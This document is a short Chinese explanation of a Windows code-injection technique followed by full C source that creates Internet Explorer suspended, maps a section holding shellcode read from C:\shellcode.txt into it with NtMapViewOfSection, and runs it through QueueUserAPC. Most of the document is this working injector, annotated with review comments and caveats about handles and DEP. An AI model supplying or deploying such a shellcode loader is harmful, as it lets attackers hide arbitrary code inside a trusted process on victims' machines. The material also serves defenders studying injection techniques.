一种注入方式:利用原生 API NtMapViewOfSection(写作当时未公开,现已有官方文档)把一个节对象映射进远程进程的地址空间,从而把代码写入该进程;再用 QueueUserAPC 在目标线程恢复运行时执行它。整个过程完全工作在用户模式下,也不需要管理员权限之类的特殊条件。需要注意两点:其一,这里之所以不需要额外权限,是因为注入器自己以 CREATE_SUSPENDED 方式创建了目标进程,因而已经持有对该进程及其主线程的完全访问句柄;若要注入一个已存在的进程,仍然需要取得带 PROCESS_VM_OPERATION 访问权的进程句柄和带 THREAD_SET_CONTEXT 访问权的线程句柄。其二,下面的示例以 FILE_MAP_READ(即 PAGE_READONLY)映射节,在启用了 DEP/NX 的系统上执行只读页面会触发访问违例。
- #define _WIN32_WINNT 0x0400
- #include <windows.h>
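/* NT native-API glue.  <windows.h> at this _WIN32_WINNT level does not
 * declare any of this, so it is defined locally.  (Do not also include
 * <winternl.h>: it declares NTSTATUS itself and the typedefs would clash.) */
typedef LONG NTSTATUS, *PNTSTATUS;

/* NTSTATUS: success and informational codes are non-negative, warnings and
 * errors have the sign bit set. */
#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)

/* InheritDisposition argument of NtMapViewOfSection: whether child processes
 * of the target inherit the mapped view. */
typedef enum _SECTION_INHERIT
{
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

/*
 * NTSTATUS NTAPI NtMapViewOfSection(
 *     HANDLE          SectionHandle,
 *     HANDLE          ProcessHandle,       -- needs PROCESS_VM_OPERATION
 *     PVOID          *BaseAddress,         -- in/out
 *     ULONG_PTR       ZeroBits,
 *     SIZE_T          CommitSize,
 *     PLARGE_INTEGER  SectionOffset,       -- optional
 *     PSIZE_T         ViewSize,            -- in/out, pointer-sized
 *     SECTION_INHERIT InheritDisposition,
 *     ULONG           AllocationType,
 *     ULONG           Win32Protect);
 *
 * Pointer-sized parameters are declared as such (ULONG_PTR / PSIZE_T / PVOID*)
 * so the typedef also matches the documented prototype on 64-bit builds; the
 * earlier ULONG for ZeroBits was only correct for 32-bit.
 */
typedef NTSTATUS (NTAPI *func_NtMapViewOfSection)(HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T,
                                                  PLARGE_INTEGER, PSIZE_T, SECTION_INHERIT,
                                                  ULONG, ULONG);

/* Resolved from ntdll.dll at runtime by the entry point; NULL until then. */
func_NtMapViewOfSection NtMapViewOfSection = NULL;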
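/*
 * Drop-in counterpart of MapViewOfFileEx() that maps a section view into an
 * arbitrary process instead of only the calling one.  It translates the Win32
 * FILE_MAP_* access flags into an NT page protection and calls
 * NtMapViewOfSection through the pointer resolved by the entry point.
 *
 * hProcess              target process handle; NtMapViewOfSection requires
 *                       PROCESS_VM_OPERATION access on it
 * hFileMappingObject    section handle (e.g. from CreateFileMapping)
 * dwDesiredAccess       FILE_MAP_READ / FILE_MAP_WRITE / FILE_MAP_COPY,
 *                       optionally combined with FILE_MAP_EXECUTE
 * dwFileOffsetHigh/Low  64-bit offset into the section at which the view starts
 * dwNumberOfBytesToMap  size of the view; 0 maps from the offset to the end
 * lpBaseAddress         preferred base address inside the target, or NULL to
 *                       let the kernel choose
 *
 * Returns the base address of the view *in the target process* (it is not
 * dereferenceable from the caller), or NULL on failure.  Note that a view
 * mapped without FILE_MAP_EXECUTE is not executable; running code from it
 * faults on DEP/NX-enforcing systems.
 */
LPVOID NTAPI MyMapViewOfFileEx(HANDLE hProcess, HANDLE hFileMappingObject, DWORD dwDesiredAccess,
                               DWORD dwFileOffsetHigh, DWORD dwFileOffsetLow,
                               DWORD dwNumberOfBytesToMap, LPVOID lpBaseAddress)
{
    NTSTATUS Status;
    LARGE_INTEGER SectionOffset;
    /* ViewSize is an in/out PSIZE_T: the kernel writes a pointer-sized value
     * back, so a 32-bit ULONG here would corrupt the stack on 64-bit builds. */
    SIZE_T ViewSize;
    ULONG Protect;
    LPVOID ViewBase;
    BOOL wantExecute;

    /* The native entry point is looked up at runtime; refuse to call a NULL pointer. */
    if (NtMapViewOfSection == NULL)
    {
        return NULL;
    }

    /* Assemble the 64-bit section offset from its two halves. */
    SectionOffset.LowPart = dwFileOffsetLow;
    SectionOffset.HighPart = dwFileOffsetHigh;

    /* In/out parameters: the kernel returns the actual base and size here. */
    ViewBase = lpBaseAddress;
    ViewSize = dwNumberOfBytesToMap;

    /* Map Win32 access flags onto an NT page protection.  Write implies read,
     * copy-on-write gets its own protection, anything else becomes no-access.
     * FILE_MAP_EXECUTE selects the executable variant of the same protection,
     * as the real MapViewOfFileEx does. */
    wantExecute = (dwDesiredAccess & FILE_MAP_EXECUTE) != 0;
    if (dwDesiredAccess & FILE_MAP_WRITE)
    {
        Protect = wantExecute ? PAGE_EXECUTE_READWRITE : PAGE_READWRITE;
    }
    else if (dwDesiredAccess & FILE_MAP_READ)
    {
        Protect = wantExecute ? PAGE_EXECUTE_READ : PAGE_READONLY;
    }
    else if (dwDesiredAccess & FILE_MAP_COPY)
    {
        Protect = wantExecute ? PAGE_EXECUTE_WRITECOPY : PAGE_WRITECOPY;
    }
    else
    {
        Protect = PAGE_NOACCESS;
    }

    /* Map the view.  ZeroBits = 0 and CommitSize = 0 leave placement and
     * commit to the kernel; ViewShare lets the target's children inherit it. */
    Status = NtMapViewOfSection(hFileMappingObject,
                                hProcess,
                                &ViewBase,
                                0,
                                0,
                                &SectionOffset,
                                &ViewSize,
                                ViewShare,
                                0,
                                Protect);
    if (!NT_SUCCESS(Status))
    {
        return NULL;
    }

    /* Address of the view inside the target's address space. */
    return ViewBase;
}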
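/*
 * Entry point.  Creates the target process suspended, maps the section that
 * backs the shellcode file into it with MyMapViewOfFileEx, queues a user-mode
 * APC whose routine is the mapped view on the target's main thread, and then
 * resumes that thread so the APC runs.  (When exactly the APC is delivered
 * after ResumeThread is not shown here; it is what the technique relies on.)
 *
 * No extra privilege is needed only because this program creates the target
 * itself: CreateProcess hands back full-access process and thread handles.
 *
 * Every API call is checked.  If anything fails after the target has been
 * created, the still-suspended target is terminated so no half-initialised
 * process is left behind.  Returns 0 on success, 1 on failure.
 */
int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
{
    int rc = 1;
    HMODULE hNtdll = NULL;
    HANDLE hFile = INVALID_HANDLE_VALUE;
    HANDLE hMappedFile = NULL;
    LPVOID MappedFile = NULL;
    STARTUPINFO st;
    PROCESS_INFORMATION pi;

    (void)hInstance;
    (void)hPrevInstance;
    (void)lpCmdLine;
    (void)nCmdShow;

    /* Zeroed up front so the cleanup path can test the handles unconditionally. */
    ZeroMemory(&pi, sizeof(pi));
    ZeroMemory(&st, sizeof(st));
    st.cb = sizeof(STARTUPINFO);

    /* ntdll.dll is mapped into every process, so no LoadLibrary is needed;
     * GetModuleHandle avoids bumping a reference count nothing releases. */
    hNtdll = GetModuleHandle("ntdll.dll");
    if (hNtdll == NULL)
    {
        goto out;
    }
    NtMapViewOfSection = (func_NtMapViewOfSection)GetProcAddress(hNtdll, "NtMapViewOfSection");
    if (NtMapViewOfSection == NULL)
    {
        goto out;
    }

    /* Payload: raw machine code read straight from disk. */
    hFile = CreateFile("C:\\shellcode.txt", GENERIC_READ, 0, NULL, OPEN_EXISTING,
                       FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFile == INVALID_HANDLE_VALUE)
    {
        goto out;
    }

    /* Read-only section backed by the file; the same section object is mapped
     * into the target below.  NOTE(review): PAGE_READONLY means the view in the
     * target is not executable, so on DEP/NX-enforcing systems the APC faults. */
    hMappedFile = CreateFileMapping(hFile, NULL, PAGE_READONLY, 0, 0, NULL);
    if (hMappedFile == NULL)
    {
        goto out;
    }

    /* Start the target suspended so the APC is queued before its main thread
     * runs.  The path is a German-locale "Program Files"; adjust for the
     * machine in use. */
    if (!CreateProcess("C:\\Programme\\Internet Explorer\\iexplore.exe", NULL, NULL, NULL, FALSE,
                       CREATE_SUSPENDED, NULL, NULL, &st, &pi))
    {
        goto out;
    }

    /* Map the whole section at a kernel-chosen address inside the target. */
    MappedFile = MyMapViewOfFileEx(pi.hProcess, hMappedFile, FILE_MAP_READ, 0, 0, 0, NULL);
    if (MappedFile == NULL)
    {
        goto out;
    }

    /* The APC routine is the mapped view itself; it runs on the target's main
     * thread once that thread is resumed.  QueueUserAPC needs
     * THREAD_SET_CONTEXT on the thread handle, which CreateProcess granted. */
    if (!QueueUserAPC((PAPCFUNC)MappedFile, pi.hThread, 0))
    {
        goto out;
    }

    if (ResumeThread(pi.hThread) == (DWORD)-1)
    {
        goto out;
    }

    rc = 0;

out:
    /* A target that was created but not successfully injected is still
     * suspended; terminate it rather than leave it hanging. */
    if (rc != 0 && pi.hProcess != NULL)
    {
        TerminateProcess(pi.hProcess, 1);
    }
    if (pi.hThread != NULL)
    {
        CloseHandle(pi.hThread);
    }
    if (pi.hProcess != NULL)
    {
        CloseHandle(pi.hProcess);
    }
    if (hMappedFile != NULL)
    {
        CloseHandle(hMappedFile);
    }
    if (hFile != INVALID_HANDLE_VALUE)
    {
        CloseHandle(hFile);
    }
    return rc;
}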